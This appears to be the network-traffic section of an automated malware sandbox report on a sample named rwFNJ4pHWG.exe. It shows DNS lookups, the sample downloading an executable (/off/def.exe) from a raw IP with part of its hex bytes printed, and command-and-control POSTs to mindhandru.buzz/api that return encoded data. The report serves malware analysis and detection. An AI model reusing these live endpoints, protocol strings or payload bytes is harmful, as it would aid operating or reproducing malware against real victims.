Dec 26, 2024 12:42:06.152231932 CET	1.1.1.1	192.168.2.7	0xedb	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:06.152231932 CET	1.1.1.1	192.168.2.7	0xedb	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 12:42:06.152264118 CET	1.1.1.1	192.168.2.7	0xecc9	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:06.152264118 CET	1.1.1.1	192.168.2.7	0xecc9	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:12.911690950 CET	1.1.1.1	192.168.2.7	0x9a6d	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:12.912827969 CET	1.1.1.1	192.168.2.7	0x23e1	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:17.590755939 CET	1.1.1.1	192.168.2.7	0xc803	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:17.591342926 CET	1.1.1.1	192.168.2.7	0xc706	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:25.251240969 CET	1.1.1.1	192.168.2.7	0xdece	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 12:42:25.251277924 CET	1.1.1.1	192.168.2.7	0x4277	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

mindhandru.buzz

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49768	185.215.113.16	80	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 12:41:43.737106085 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 26, 2024 12:41:45.169377089 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Dec 2024 11:41:44 GMT Content-Type: application/octet-stream Content-Length: 2801664 Last-Modified: Thu, 26 Dec 2024 11:19:36 GMT Connection: keep-alive ETag: "676d3bc8-2ac000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 c5 4d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+M+`Ui`D @ @ @.rsrcD``@.idata f@gtwxvlel@2h@vnlbxhun *@.taggant@+"@
Dec 26, 2024 12:41:45.169399023 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:45.169410944 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:45.169569969 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:45.169666052 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:45.169680119 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:45.169689894 CET	776	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:45.169702053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 12:41:45.169792891 CET	1236	IN	Data Raw: 4f bf 13 24 49 bd b8 b9 4d 4d b6 92 92 4e 46 90 71 5e 46 20 4f bf 13 24 49 bd b8 f5 4d 4d b6 92 92 4e 46 90 71 5e 46 20 4f bf 33 25 49 bd b8 71 4e 4d b6 92 92 4e 46 90 71 5e 46 20 4f bf 33 25 49 bd b8 cb 4e 4d b6 92 12 52 46 90 71 5e 46 20 4f bf Data Ascii: O$IMMNFq^F O$IMMNFq^F O3%IqNMNFq^F O3%INMRFq^F O3%IOMRFq^F O3%IOMRFq^F O+JF'Mp Ib IMF IMF IG IG IPF IaF JkHHjMF*sjNF!IMF IYF IzNy{yP\|~ IMF%IF IN Ip IUO IQ IpMF IZ IuL IpsI`
Dec 26, 2024 12:41:45.169840097 CET	1236	IN	Data Raw: 49 4d 46 20 49 cd 46 b1 69 1a 4b 6e 4a 5c 46 20 49 4d 46 a0 49 de 66 b5 4d a3 47 33 49 4d 46 20 49 cd 46 b1 69 72 4e 80 4a 64 46 88 69 4d 46 20 49 de 46 e5 4e bf 47 43 49 d5 66 20 49 4d 46 b1 49 fd 4a 92 4a 70 46 00 6a 4d 46 20 49 de 46 04 52 bf Data Ascii: IMF IFiKnJ\F IMFIfMG3IMF IFirNJdFiMF IFNGCIf IMFIJJpFjMF IFRGCIg IMFIOJpFjMF IFMGCI}h IMFIQJqFkMF IF2RGGIj IMFaO&ItF iMF IMF!I\|K IOFSOF#IpK INF]NMF!IGO INF[MMF"IN INF~NMF"IK IPFSMF!IO IOFdNMF#IP iMF
Dec 26, 2024 12:41:45.288978100 CET	1236	IN	Data Raw: 49 4d 46 20 49 4d a7 84 bf ae b6 89 7c 7f 46 6d b2 b0 b8 8f bc bc ac 94 77 a4 af 8e 7c 7f 46 5c 96 bc aa 95 b5 b2 84 20 98 bd ab 8e 9c b2 b8 96 b2 b0 ab 61 49 a1 95 6b 8e 9b a5 72 8e 8e 8a 20 9c a1 87 6e 8d 8e 98 64 a8 9f 8f 67 91 a1 99 7f 9b 92 Data Ascii: IMF IM\|Fmw\|F\ aIkr ndgdItd vadIarisqeMcnrev mgeeereIrroenFpmnFsiheI

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49709	172.67.165.185	443	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:22 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mindhandru.buzz
2024-12-26 11:41:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 11:41:23 UTC	1125	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o98s2ii28seff118qh18ss69bo; expires=Mon, 21 Apr 2025 05:28:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lLM1l7nA%2FNXBYxzZ2AKJDpcihfAocm7VAjDV9YjGINCjYp3W9oOa%2B97uklTRC4FyoAaRq%2BYhhJWz4ZknlWYVDr7cXjk2XVWDwB91K6EeOxkK7PfvZ1LwnRRdl%2FYwuCod1N0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd2a19fd433d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1594&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1778319&cwnd=252&unsent_bytes=0&cid=b50927f74f820ff1&ts=770&x=0"
2024-12-26 11:41:23 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 11:41:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49715	172.67.165.185	443	7704	C:\Users\user\Desktop\rwFNJ4pHWG.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 11:41:24 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: mindhandru.buzz
2024-12-26 11:41:24 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-26 11:41:25 UTC	1123	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 11:41:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kggrcr9tlg7ol2vc8lr5tfsfe6; expires=Mon, 21 Apr 2025 05:28:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UuStKe18vO81Q5rHmyj%2BWE7PsfOeF25tCTfSagWoVAOXpiVoB9MBfj084l%2BcbctzRC5Ssl%2Fj6hX9wOmMdhm7oF8d1XGGEWmXir52RknzsCSXM5JQNDO72LrkxttwnAlp8oE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80cd381d157d02-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1795&rtt_var=731&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1440552&cwnd=230&unsent_bytes=0&cid=7eca0a572353e541&ts=776&x=0"
2024-12-26 11:41:25 UTC	246	IN	Data Raw: 34 36 63 0d 0a 57 62 70 47 44 39 59 67 76 76 79 72 58 6a 62 56 7a 7a 6b 70 54 65 35 77 45 31 50 49 58 6e 6a 44 42 54 6f 68 44 73 6f 65 45 44 55 69 6d 44 41 74 37 42 53 53 33 74 67 37 46 4f 2b 37 53 31 77 6f 77 6c 4a 79 4e 2b 70 6b 48 71 4a 70 53 55 51 69 36 47 68 39 46 32 50 63 4a 32 4f 6c 52 5a 4c 65 7a 69 59 55 37 35 52 43 43 79 69 41 55 69 6c 78 72 54 51 61 6f 6d 6c 59 51 47 57 6c 62 6e 78 57 4d 64 59 68 5a 37 4e 44 32 70 33 48 4d 31 4f 77 71 6c 68 44 49 34 63 64 65 7a 37 71 63 6c 71 6d 66 78 67 62 4c 49 64 37 5a 46 51 55 32 7a 56 6b 39 46 32 53 68 34 6b 37 57 50 66 31 47 30 67 6f 6a 42 78 31 4e 36 4d 32 45 4b 74 68 57 55 56 6b 75 6e 64 32 58 54 48 59 49 6d 61 35 53 73 36 51 7a 54 52 59 74 71 42 59 43 32 48 4d 46 57 6c 78 38 Data Ascii: 46cWbpGD9YgvvyrXjbVzzkpTe5wE1PIXnjDBTohDsoeEDUimDAt7BSS3tg7FO+7S1wowlJyN+pkHqJpSUQi6Gh9F2PcJ2OlRZLeziYU75RCCyiAUilxrTQaomlYQGWlbnxWMdYhZ7ND2p3HM1OwqlhDI4cdez7qclqmfxgbLId7ZFQU2zVk9F2Sh4k7WPf1G0gojBx1N6M2EKthWUVkund2XTHYIma5Ss6QzTRYtqBYC2HMFWlx8
2024-12-26 11:41:25 UTC	893	IN	Data Raw: 6e 78 4a 6b 32 52 4a 55 6e 6d 6c 62 48 51 58 4a 4a 59 39 4c 62 4e 4f 6e 4d 61 4a 4e 46 69 35 71 46 68 45 4b 49 30 53 59 7a 36 71 50 78 4b 70 59 31 4a 4d 59 36 64 79 65 46 41 7a 30 53 4e 69 73 30 72 61 6b 63 70 38 47 76 65 71 51 77 74 33 7a 44 4a 68 4d 71 6b 6f 46 37 41 6e 52 77 31 31 36 48 74 2b 46 32 4f 59 49 6d 4f 31 54 39 79 4d 77 54 64 66 73 72 39 51 51 69 4b 42 45 6e 77 37 70 54 38 61 70 6d 31 53 54 47 61 73 63 58 39 52 4f 39 68 6b 49 2f 52 46 78 4e 36 52 66 48 65 79 76 56 78 48 4f 63 34 6f 4d 53 37 6b 4a 56 71 6d 61 78 67 62 4c 4b 42 35 63 56 51 77 31 79 64 6c 76 31 44 63 6a 4d 38 78 55 61 57 72 58 6b 55 6c 6a 77 42 37 50 36 77 2f 45 36 70 75 58 55 52 6f 36 44 49 79 55 43 4f 59 66 43 32 56 54 39 65 53 77 79 74 55 39 37 49 56 55 6d 2b 4c 48 6a 46 70 Data Ascii: nxJk2RJUnmlbHQXJJY9LbNOnMaJNFi5qFhEKI0SYz6qPxKpY1JMY6dyeFAz0SNis0rakcp8GveqQwt3zDJhMqkoF7AnRw116Ht+F2OYImO1T9yMwTdfsr9QQiKBEnw7pT8apm1STGascX9RO9hkI/RFxN6RfHeyvVxHOc4oMS7kJVqmaxgbLKB5cVQw1ydlv1DcjM8xUaWrXkUljwB7P6w/E6puXURo6DIyUCOYfC2VT9eSwytU97IVUm+LHjFp
2024-12-26 11:41:25 UTC	1369	IN	Data Raw: 34 34 62 30 0d 0a 48 48 59 6e 36 69 4e 55 75 43 64 66 54 79 7a 77 50 48 31 59 4e 4e 41 6b 62 4c 42 50 32 4a 2f 45 4d 46 32 30 6f 56 64 44 49 6f 41 57 66 6a 6d 69 50 78 4b 7a 61 56 5a 46 61 71 68 35 4d 68 6c 37 33 7a 77 74 37 41 4c 34 6b 4e 34 6f 58 2f 57 59 57 45 55 68 69 77 51 78 4c 75 51 6c 57 71 5a 72 47 42 73 73 70 6e 46 35 57 7a 7a 52 4a 57 36 30 53 4e 4b 52 77 7a 52 63 74 36 42 61 51 43 65 4b 48 33 6f 2b 70 54 73 53 6f 6d 74 64 54 6d 2f 6f 4d 6a 4a 51 49 35 68 38 4c 5a 46 4d 33 34 2f 59 66 6d 47 30 6f 31 56 4d 4f 63 77 4e 50 79 6a 71 4f 78 62 68 50 78 68 4a 61 36 39 34 66 31 30 34 33 43 42 67 75 30 76 56 6c 39 73 32 57 4c 6d 2f 56 6b 45 71 67 68 35 30 50 71 6f 39 47 36 39 74 55 77 4d 69 36 48 74 71 46 32 4f 59 43 32 43 6b 55 4e 61 56 32 48 35 68 74 Data Ascii: 44b0HHYn6iNUuCdfTyzwPH1YNNAkbLBP2J/EMF20oVdDIoAWfjmiPxKzaVZFaqh5Mhl73zwt7AL4kN4oX/WYWEUhiwQxLuQlWqZrGBsspnF5WzzRJW60SNKRwzRct6BaQCeKH3o+pTsSomtdTm/oMjJQI5h8LZFM34/YfmG0o1VMOcwNPyjqOxbhPxhJa694f1043CBgu0vVl9s2WLm/VkEqgh50Pqo9G69tUwMi6HtqF2OYC2CkUNaV2H5ht
2024-12-26 11:41:25 UTC	1369	IN	Data Raw: 33 7a 44 31 79 4a 36 42 38 42 65 39 2b 47 45 52 67 36 43 51 79 58 54 66 63 4a 32 47 39 54 74 47 66 7a 54 74 5a 73 36 31 64 54 53 71 4e 47 58 6b 39 70 54 59 57 70 57 74 52 52 57 43 72 66 33 51 58 64 5a 67 6a 64 66 51 61 6e 4c 2f 45 4e 31 69 33 72 6b 70 4d 62 38 4a 53 66 7a 65 71 66 45 4b 33 64 30 39 45 63 2b 5a 6c 4d 6c 41 33 6d 48 77 74 76 6c 44 5a 6b 4d 30 32 55 62 4f 68 55 55 73 71 6e 68 70 33 4e 71 59 30 48 36 35 68 58 55 35 72 6f 33 39 67 52 54 6a 63 4b 6d 48 30 44 4a 79 5a 30 58 77 4d 39 34 68 4d 53 44 2b 4b 45 54 45 75 35 43 56 61 70 6d 73 59 47 79 79 6f 63 6e 35 63 50 4e 4d 76 61 62 42 43 30 5a 58 48 4d 6c 32 37 70 56 64 4d 50 59 45 58 65 54 75 6a 4f 52 61 73 5a 45 70 41 62 65 67 79 4d 6c 41 6a 6d 48 77 74 6b 33 48 72 76 59 6b 6a 47 71 37 74 58 45 Data Ascii: 3zD1yJ6B8Be9+GERg6CQyXTfcJ2G9TtGfzTtZs61dTSqNGXk9pTYWpWtRRWCrf3QXdZgjdfQanL/EN1i3rkpMb8JSfzeqfEK3d09Ec+ZlMlA3mHwtvlDZkM02UbOhUUsqnhp3NqY0H65hXU5ro39gRTjcKmH0DJyZ0XwM94hMSD+KETEu5CVapmsYGyyocn5cPNMvabBC0ZXHMl27pVdMPYEXeTujORasZEpAbegyMlAjmHwtk3HrvYkjGq7tXE
2024-12-26 11:41:25 UTC	1369	IN	Data Raw: 58 54 4b 6c 4e 31 71 2b 4b 55 45 44 61 36 51 38 4b 68 63 38 30 43 78 6a 74 30 54 58 6b 73 55 39 58 62 47 6f 55 30 77 67 69 78 74 32 4d 61 77 75 48 61 78 75 57 45 68 6c 6f 6e 68 7a 58 48 75 57 5a 47 71 73 41 6f 54 65 2b 7a 74 43 70 36 34 62 56 47 47 56 55 6e 59 39 36 6d 52 61 72 48 56 5a 52 6e 36 73 63 33 6c 46 4d 4e 34 6b 61 4b 5a 46 30 4a 54 47 50 31 79 36 72 6c 4e 5a 4c 34 45 53 59 79 4f 73 4e 78 54 68 4b 52 68 45 64 4f 67 6b 4d 6d 59 73 30 32 52 79 2b 6c 75 63 6d 63 56 38 44 50 65 75 55 55 59 68 6e 68 5a 33 4f 71 6b 79 45 71 52 76 58 45 6c 68 70 33 64 34 58 6a 50 59 4b 32 69 38 53 64 71 51 79 44 70 59 75 75 30 56 43 79 69 55 55 69 6c 78 6a 53 59 58 70 33 42 4a 64 6d 75 6f 4c 54 4a 49 64 63 46 6b 61 72 67 43 68 4e 37 45 4d 46 36 36 71 46 39 44 4b 49 38 Data Ascii: XTKlN1q+KUEDa6Q8Khc80Cxjt0TXksU9XbGoU0wgixt2MawuHaxuWEhlonhzXHuWZGqsAoTe+ztCp64bVGGVUnY96mRarHVZRn6sc3lFMN4kaKZF0JTGP1y6rlNZL4ESYyOsNxThKRhEdOgkMmYs02Ry+lucmcV8DPeuUUYhnhZ3OqkyEqRvXElhp3d4XjPYK2i8SdqQyDpYuu0VCyiUUilxjSYXp3BJdmuoLTJIdcFkargChN7EMF66qF9DKI8
2024-12-26 11:41:25 UTC	1369	IN	Data Raw: 6a 73 57 34 54 38 59 54 57 47 75 66 58 4e 66 4d 39 67 69 5a 37 42 42 31 5a 33 4f 4e 56 4b 38 72 6c 46 45 4b 49 6f 57 63 54 71 74 4d 68 79 6b 62 46 45 44 49 75 68 37 61 68 64 6a 6d 41 4a 4f 70 6c 44 75 6b 4d 6f 6e 46 4b 6a 6a 51 67 73 6f 67 46 49 70 63 61 45 30 46 62 4e 69 55 55 74 6f 6f 58 78 32 58 54 62 66 4a 47 69 35 52 39 69 51 7a 54 74 55 75 36 4a 63 51 79 43 49 45 6e 35 78 35 48 77 64 75 53 63 41 41 30 79 6a 61 6c 4e 5a 4d 4d 70 6b 63 76 70 62 6e 4a 6e 46 66 41 7a 33 6f 31 4a 4b 4a 34 49 65 65 54 57 34 50 42 47 6f 61 46 6c 4d 62 4b 74 39 65 46 38 70 33 69 52 6d 76 45 58 55 6d 73 63 75 56 62 6a 74 46 51 73 6f 6c 46 49 70 63 5a 73 71 48 61 5a 6f 47 6d 70 72 73 33 31 34 56 44 44 55 5a 48 4c 36 57 35 79 5a 78 58 77 4d 39 36 42 58 52 69 75 65 48 6e 45 78 Data Ascii: jsW4T8YTWGufXNfM9giZ7BB1Z3ONVK8rlFEKIoWcTqtMhykbFEDIuh7ahdjmAJOplDukMonFKjjQgsogFIpcaE0FbNiUUtooXx2XTbfJGi5R9iQzTtUu6JcQyCIEn5x5HwduScAA0yjalNZMMpkcvpbnJnFfAz3o1JKJ4IeeTW4PBGoaFlMbKt9eF8p3iRmvEXUmscuVbjtFQsolFIpcZsqHaZoGmprs314VDDUZHL6W5yZxXwM96BXRiueHnEx
2024-12-26 11:41:25 UTC	1369	IN	Data Raw: 46 73 56 6b 5a 74 70 48 5a 31 57 53 6e 5a 4c 6d 47 31 52 64 75 56 32 7a 64 47 76 4b 56 59 52 53 65 46 45 6e 38 78 71 7a 45 61 34 53 6b 59 52 48 54 6f 4a 44 4a 79 47 4d 38 79 5a 2f 5a 68 79 34 6a 44 4f 31 69 68 70 6c 70 49 4f 59 45 43 4d 58 2f 71 4c 52 32 77 4a 77 42 56 66 4c 39 37 62 52 6b 69 6d 43 4e 68 39 42 71 63 6c 63 59 79 57 62 79 70 55 6b 34 6e 6a 78 64 30 4f 36 59 77 47 36 6c 75 55 6b 5a 70 72 6e 5a 78 57 54 54 5a 4b 47 6d 39 54 4e 58 65 68 33 78 54 72 2b 30 44 43 78 6d 63 46 57 6b 38 75 6e 34 6f 6f 6e 5a 4a 56 6d 47 34 65 6a 42 34 4f 4e 51 6e 61 4c 4e 53 6e 49 47 48 4a 52 53 77 6f 52 73 54 62 34 77 57 66 54 4b 74 4d 68 57 73 61 46 39 49 59 36 4a 79 59 46 67 2b 30 43 68 6c 75 56 44 57 6c 4e 73 31 58 62 71 6a 55 31 6b 73 7a 46 77 78 4e 72 4a 38 51 Data Ascii: FsVkZtpHZ1WSnZLmG1RduV2zdGvKVYRSeFEn8xqzEa4SkYRHToJDJyGM8yZ/Zhy4jDO1ihplpIOYECMX/qLR2wJwBVfL97bRkimCNh9BqclcYyWbypUk4njxd0O6YwG6luUkZprnZxWTTZKGm9TNXeh3xTr+0DCxmcFWk8un4oonZJVmG4ejB4ONQnaLNSnIGHJRSwoRsTb4wWfTKtMhWsaF9IY6JyYFg+0ChluVDWlNs1XbqjU1kszFwxNrJ8Q
2024-12-26 11:41:25 UTC	1369	IN	Data Raw: 42 58 62 35 78 59 6c 51 2b 33 78 70 54 75 6b 58 49 6d 63 63 36 56 50 66 6a 47 30 52 76 31 43 73 78 65 65 6f 44 56 4f 46 2f 47 42 73 73 6e 58 39 38 57 54 7a 4f 4e 53 43 58 56 63 71 55 30 6e 35 79 73 4c 78 53 58 53 4b 65 55 6a 39 78 72 48 78 43 38 53 6b 59 52 33 33 6f 4a 43 49 46 59 49 31 33 4f 75 51 51 77 39 44 51 66 45 4c 33 39 51 6b 46 62 35 35 53 4b 58 48 74 50 77 69 7a 59 56 74 56 62 2b 39 43 54 48 63 77 7a 69 56 67 76 30 37 69 6f 4e 77 2f 57 72 6d 71 54 56 70 76 77 6c 4a 2b 63 66 49 46 57 75 6b 6e 5a 77 30 73 73 44 77 71 46 77 37 62 4b 6d 4f 7a 56 4d 33 54 36 54 64 43 74 71 42 51 52 32 32 4e 48 32 45 32 36 6e 4a 61 70 79 63 41 45 79 4c 6f 65 47 4d 58 59 34 68 32 4e 75 45 52 69 38 36 62 49 78 71 75 37 55 30 4c 64 39 35 63 4d 53 50 71 5a 46 72 6d 5a 45 Data Ascii: BXb5xYlQ+3xpTukXImcc6VPfjG0Rv1CsxeeoDVOF/GBssnX98WTzONSCXVcqU0n5ysLxSXSKeUj9xrHxC8SkYR33oJCIFYI13OuQQw9DQfEL39QkFb55SKXHtPwizYVtVb+9CTHcwziVgv07ioNw/WrmqTVpvwlJ+cfIFWuknZw0ssDwqFw7bKmOzVM3T6TdCtqBQR22NH2E26nJapycAEyLoeGMXY4h2NuERi86bIxqu7U0Ld95cMSPqZFrmZE
2024-12-26 11:41:25 UTC	1369	IN	Data Raw: 62 58 46 58 4d 4a 68 71 4c 62 49 43 68 4d 79 48 66 46 43 6d 37 51 4d 62 66 64 64 48 49 6d 62 36 62 67 58 76 66 68 68 56 4c 50 41 75 50 42 63 70 6d 48 77 74 38 30 48 4f 6a 4d 38 2f 51 72 54 71 5a 58 55 4a 6a 78 56 33 4d 71 51 72 43 2b 4e 49 57 30 68 67 70 48 74 6b 61 51 58 4e 4a 32 4f 36 52 63 71 50 69 58 49 55 75 4f 30 44 63 6d 2b 64 47 48 5a 39 34 6e 41 4c 73 6d 6c 54 56 57 76 6f 51 7a 77 58 49 35 68 38 4c 59 46 42 30 70 44 4f 4b 6b 58 36 69 31 68 4d 4b 59 38 63 5a 69 44 71 63 6c 71 6e 4a 77 41 52 49 75 68 34 59 78 64 6a 69 48 59 32 34 52 47 4c 7a 70 73 6a 47 71 37 74 54 51 74 33 33 31 77 78 49 2b 70 6b 57 75 5a 70 56 55 4a 76 70 6e 39 67 52 54 33 62 4d 6d 37 7a 66 4f 4b 37 78 44 46 52 75 61 70 6c 64 51 36 47 41 6e 77 2b 72 51 49 6b 6c 6e 5a 66 55 79 36 Data Ascii: bXFXMJhqLbIChMyHfFCm7QMbfddHImb6bgXvfhhVLPAuPBcpmHwt80HOjM8/QrTqZXUJjxV3MqQrC+NIW0hgpHtkaQXNJ2O6RcqPiXIUuO0Dcm+dGHZ94nALsmlTVWvoQzwXI5h8LYFB0pDOKkX6i1hMKY8cZiDqclqnJwARIuh4YxdjiHY24RGLzpsjGq7tTQt331wxI+pkWuZpVUJvpn9gRT3bMm7zfOK7xDFRuapldQ6GAnw+rQIklnZfUy6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
